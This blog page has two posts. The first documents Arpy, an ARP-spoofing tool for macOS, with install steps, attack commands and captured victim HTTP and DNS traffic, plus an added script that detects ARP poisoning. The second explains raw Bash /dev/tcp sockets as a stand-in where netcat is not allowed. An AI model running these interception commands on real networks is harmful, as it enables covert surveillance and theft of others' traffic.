Showing posts with label TCP/UDP.

Tuesday, February 9, 2016

Arpy - Mac OSX Arp Spoof (MITM) Tool


Arpy is an easy-to-use ARP spoofing MiTM tool for Mac. It provides 3 targeted functions: 
  • Packet Sniffing
  • Visited Domains
  • Visited Domains with Gource

Each function will be explained below. 

Tested OS (to date) 
  • Darwin 14.3.0 Darwin Kernel Version 14.3.0 (Mac OS X)

Requirements 
  • Python 2.7
  • Gource
  • Scapy

Installation 

Gource 
brew install gource

Scapy 
pip install scapy

Sample Commands 
ivanvza:~/ > sudo arpy
     _____
    |  _  |___ ___ _ _
    |     |  _| . | | |
    |__|__|_| |  _|_  |
    MiTM Tool |_| |___|
    v3.15 -@viljoenivan

Usage: arpy -t <Target IP> -g <Gateway IP> -i <Interface>

ARP MiTM Tool

Options:
  -h, --help            show this help message and exit
  -t TARGET, --target=TARGET
                        The Target IP
  -g GATEWAY, --gateway=GATEWAY
                        The Gateway
  -i INTERFACE, --interface=INTERFACE
                        Interface to use
  --tcp                 Filters out only tcp traffic
  --udp                 Filters out only udp traffic
  -d D_PORT, --destination_port=D_PORT
                        Filter for a destination port
  -s S_PORT, --source_port=S_PORT
                        Filter for a source port
  --sniff               Sniff all passing data
  --sniff-dns           Sniff only searched domains
  --sniff-dns-gource    Output target's DNS searches in gource format
  -v                    Verbose scapy packet print

Packet Sniff 
This is the packet sniffer; it lets you see your target's traffic. 
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
     _____
    |  _  |___ ___ _ _
    |     |  _| . | | |
    |__|__|_| |  _|_  |
    MiTM Tool |_| |___|
    v3.15 -@viljoenivan


  [Info] Starting Sniffer...

[Info] Enabling IP Forwarding...
[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3))

[Info] Found the following (IP layer): 192.168.1.3 -> 46.101.34.90
GET / HTTP/1.1
User-Agent: curl/7.37.1
Host: ivanvza.ninja
Accept: */*



[Info] Found the following (IP layer): 46.101.34.90 -> 192.168.1.3
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2719538271"
Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
Content-Length: 3213
Date: Fri, 29 May 2015 20:15:06 GMT
Server: Microsoft IIS

<html>
     <title>><></title>
    <body>
        <pre style="line-height: 1.25; white-space: pre;">
        \          SORRY            /
         \                         /
          \    This page does     /
           ]   not exist yet.    [    ,'|
           ]                     [   /  |
           ]___               ___[ ,'   |
           ]  ]\             /[  [ |:   |
           ]  ] \           / [  [ |:   |
           ]  ]  ]         [  [  [ |:   |
           ]  ]  ]__     __[  [  [ |:   |
           ]  ]  ] ]\ _ /[ [  [  [ |:   |
           ]  ]  ] ] (#) [ [  [  [ :===='
           ]  ]  ]_].nHn.[_[  [  [
           ]  ]  ]  HHHHH. [  [  [
           ]  ] /   `HH("N  \ [  [
           ]__]/     HHH  "  \[__[
           ]         NNN         [
           ]         N/"         [
           ]         N H         [
          /          N            \
         /           q,            \
        /                           \
        </pre>
        <h3 id="list"><h3>
    </body>
<script>

// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
var RTCPeerConnection = /*window.RTCPeerConnection ||

DNS Sniff 
This function allows you to see domain names that your target is currently requesting. 
ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
     _____
    |  _  |___ ___ _ _
    |     |  _| . | | |
    |__|__|_| |  _|_  |
    MiTM Tool |_| |___|
         - @viljoenivan


  [Info] Starting DNS Sniffer...

[Info] Enabling IP Forwarding...
[Info] Done...
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: www.youtube.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s2.googleusercontent.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: s.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: fonts.gstatic.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: yt3.ggpht.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: i.ytimg.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.
Target: 192.168.1.4 -> (192.168.1.1/DNS server) has searched for: safebrowsing-cache.google.com.

DNS Sniff With Gource 
This function is more or less the same as the above, but it also writes the result in a format that can be passed through Gource to get a live feed of what your target is viewing. 
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
[INFO] For a live gource feed run this command in parallel with this one:

tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -

[Info] Filter: ((src host 192.168.1.3 or dst host 192.168.1.3) and dst port 53)
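Arpy gets into the middle by poisoning the ARP caches of the target and of the gateway, so that both send their frames to the attacker's MAC; the sniff filters above then simply watch the redirected traffic. The symptom this leaves on a poisoned host is one MAC address bound to more than one IP (typically the gateway's address and the poisoning host's own). The script below, added here as an example and not part of Arpy, scans an `arp -an` listing for exactly that. The function names are my own, and the sample cache listing is constructed.

```sh
#!/bin/sh
# Added example (not part of Arpy): scan an `arp -an` listing for a MAC that
# is bound to more than one IP on the same interface, the symptom left on a
# host whose ARP cache has been poisoned. Handles the macOS/BSD format
# ("? (ip) at mac on en0 ...") and the Linux net-tools format
# ("? (ip) at mac [ether] on eth0").

# Read the listing on stdin; print "iface mac ip ip..." per duplicated MAC.
find_duplicate_macs() {
    awk '
    {
        ip = ""; mac = ""; iface = ""
        for (i = 1; i <= NF; i++) {
            if (ip == "" && $i ~ /^\(.*\)$/) { ip = substr($i, 2, length($i) - 2) }
            else if ($i == "at" && i < NF) { mac = $(i + 1) }
            else if ($i == "on" && i < NF) { iface = $(i + 1) }
        }
        n = split(mac, o, ":")
        # entries shown as "at (incomplete)" carry no 6-octet MAC: skip them
        if (ip == "" || iface == "" || n != 6) next
        # macOS prints unpadded octets ("a:b:c:d:e:f"); normalize to two hex digits
        mac = ""
        for (i = 1; i <= 6; i++) {
            oct = tolower(o[i])
            if (length(oct) == 1) oct = "0" oct
            mac = mac (i > 1 ? ":" : "") oct
        }
        key = iface " " mac
        ips[key] = ips[key] " " ip
        count[key]++
    }
    END {
        for (k in ips) if (count[k] > 1) print k ips[k]
    }' | sort
}

# Run against the live cache of this host; returns 1 (and reports on stderr)
# when a MAC is bound to several IPs.
check_arp_cache() {
    command -v arp >/dev/null 2>&1 || { echo "arp command not found" >&2; return 2; }
    dups=$(arp -an | find_duplicate_macs)
    if [ -n "$dups" ]; then
        printf 'ARP cache: one MAC bound to several IPs (possible ARP spoofing):\n%s\n' "$dups" >&2
        return 1
    fi
    return 0
}

# Constructed sample of a poisoned macOS cache: the gateway (192.168.1.1)
# and another host (192.168.1.5) both resolve to the same MAC.
SAMPLE_ARP_TABLE='? (192.168.1.1) at aa:bb:cc:0:0:1 on en0 ifscope [ethernet]
? (192.168.1.4) at 11:22:33:44:55:66 on en0 ifscope [ethernet]
? (192.168.1.5) at aa:bb:cc:0:0:1 on en0 ifscope [ethernet]
? (192.168.1.9) at (incomplete) on en0 ifscope [ethernet]
? (224.0.0.251) at 1:0:5e:0:0:fb on en0 ifscope permanent [ethernet]'

# Demo on the constructed sample; on a real host run: check_arp_cache
printf '%s\n' "$SAMPLE_ARP_TABLE" | find_duplicate_macs
```

A MAC that legitimately serves several IPs (a router with aliases, a VRRP address) will also show up here, so treat the output as something to compare against what you expect on that segment rather than as proof on its own; comparing the gateway's current MAC against a known-good value is the natural second check.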

Sample Gource footage 



Saturday, September 26, 2015

How To Open TCP/UDP Sockets


How to open TCP/UDP sockets using a built-in feature in Bash?

Bash has a built-in feature that lets you open TCP/UDP sockets with a simple redirection syntax. This is very useful when tools like netcat are not installed or we are not allowed to use them.
The syntax is
$ exec {file-descriptor}<>/dev/{protocol}/{host}/{port}

  • {file-descriptor} – 0, 1 and 2 are reserved for stdin, stdout and stderr respectively, so use at least 3. The Bash manual suggests being careful with descriptors above 9, since they could conflict with descriptors used internally by the shell.
  • <> – the file is opened for both reading and writing
  • {protocol} – tcp or udp (lowercase, as in /dev/tcp and /dev/udp)
  • {host} – IP address or domain name of the host
  • {port} – port number

Sockets can be closed using
$ exec {file-descriptor}<&-
(exec {file-descriptor}>&- works as well)
To send a message through the socket
echo -e -n "$MSG_OUT" >&3
or
printf "$MSG_OUT" >&3
To read one line from the socket into a variable
read -r MSG_IN <&3
Output can be read line by line in a loop
while read -r LINE <&3
do
    echo "$LINE"
done
Or read entirely into one variable
OUTPUT=$(dd bs="$BYTES" count=1 <&3 2> /dev/null)

Example:

$ exec 3<>/dev/tcp/127.0.0.1/1234
This opens a socket, for reading and writing, to port 1234 on the loopback interface.
The /dev/tcp and /dev/udp files aren't real devices but keywords interpreted by the Bash shell. Being a "bashism", this solution is not portable, even if it seems that the ksh and zsh shells have the same feature.
In this example we fetch the Google main page (HTTP/1.1 requires a Host header, and Connection: close makes the server end the connection so that cat returns):
$ exec 3<>/dev/tcp/www.google.com/80
$ printf 'GET / HTTP/1.1\r\nHost: www.google.com\r\nConnection: close\r\n\r\n' >&3
$ cat <&3
It's good practice to always close file descriptors (either form closes descriptor 3)
$ exec 3<&-
$ exec 3>&-
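Putting the steps above together: the script below is an added example, not code from the post, that wraps the open / send / read / close sequence in a small HTTP/1.1 client over /dev/tcp. It assumes a Bash built with --enable-net-redirections and a reachable host; the function names (valid_fd, build_http_request, http_status_code, http_get) are this example's own.

```bash
#!/bin/bash
# Added example (not from the post): a small HTTP/1.1 client over Bash's
# /dev/tcp redirection. Assumes a Bash built with --enable-net-redirections
# and a reachable host.

# The post reserves 0-2 for stdin/stdout/stderr and warns that descriptors
# above 9 may collide with the shell's own, so accept only 3..9.
valid_fd() {
    case "$1" in
        [3-9]) return 0 ;;
        *)     return 1 ;;
    esac
}

# HTTP/1.1 requires a Host header and CRLF line endings; "Connection: close"
# makes the server hang up, which is what ends the read loop in http_get.
build_http_request() {
    printf 'GET %s HTTP/1.1\r\nHost: %s\r\nConnection: close\r\n\r\n' "$2" "$1"
}

# Pull the three-digit status code out of a status line such as
# "HTTP/1.1 200 OK"; fails when the line is not a status line.
http_status_code() {
    # intentional word splitting of the status line
    set -- $1
    case "$2" in
        [0-9][0-9][0-9]) printf '%s\n' "$2" ;;
        *) return 1 ;;
    esac
}

# http_get HOST [PORT] [PATH] [FD]: print the raw response, then close the fd.
http_get() {
    host=$1; port=${2:-80}; path=${3:-/}; fd=${4:-3}
    valid_fd "$fd" || { echo "descriptor must be 3..9" >&2; return 2; }
    # Open the socket for reading and writing on the chosen descriptor
    # (eval lets the descriptor number come from a variable).
    if ! eval "exec $fd<>/dev/tcp/$host/$port" 2>/dev/null; then
        echo "connect to $host:$port failed" >&2
        return 1
    fi
    build_http_request "$host" "$path" >&"$fd"
    # Read until the server closes. -t bounds each read so a silent peer
    # cannot hang the script; the trailing CR of each line is stripped.
    # The "|| [ -n "$line" ]" keeps a final line that lacks a newline.
    while IFS= read -r -t 5 line <&"$fd" || [ -n "$line" ]; do
        printf '%s\n' "${line%$'\r'}"
    done
    # Always release the descriptor, as the post advises.
    eval "exec $fd<&-"
}

# Usage (needs a network, so only runs when asked):
#   ./script.sh --fetch www.google.com 80 /
if [ "${1-}" = "--fetch" ]; then
    http_get "${2:?host}" "${3:-80}" "${4:-/}"
fi
```

The read timeout is the part the post's `cat <&3` lacks: a server that keeps the connection open without sending anything would otherwise block the shell indefinitely.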

Finally, an IRC client example:
#!/bin/bash

##########################################################
# Config

NICK="CyberPunk"
SERVER="irc.n0where.net"
PORT=6667
CHANNEL="#CyberPunk"

##########################################################
# Main

# Open a read/write TCP socket to the IRC server on descriptor 3
exec 3<>/dev/tcp/${SERVER}/${PORT}
# Registration: NICK, then USER <user> <mode> <unused> :<realname>, then join
echo "NICK ${NICK}" >&3
echo "USER ${NICK} 8 * : ${NICK}" >&3
echo "JOIN ${CHANNEL}" >&3
# Dump everything the server sends until it closes the connection
# (a real client would also have to answer the server's PING messages)
cat <&3

exit $?

Enable/disable net redirections

Note that the feature must be enabled when Bash is compiled. If you compile Bash yourself, enable it with the flag
--enable-net-redirections
or disable it explicitly with
--disable-net-redirections
Each distribution may or may not have the feature enabled in its precompiled Bash.
Since this is a compile-time option, check that your Bash has it before relying on it; ksh and zsh also seem to have it. System administrators might want to disable this feature since it could represent a security concern. In general, dedicated tools for creating sockets like netcat and socat are preferable where possible.

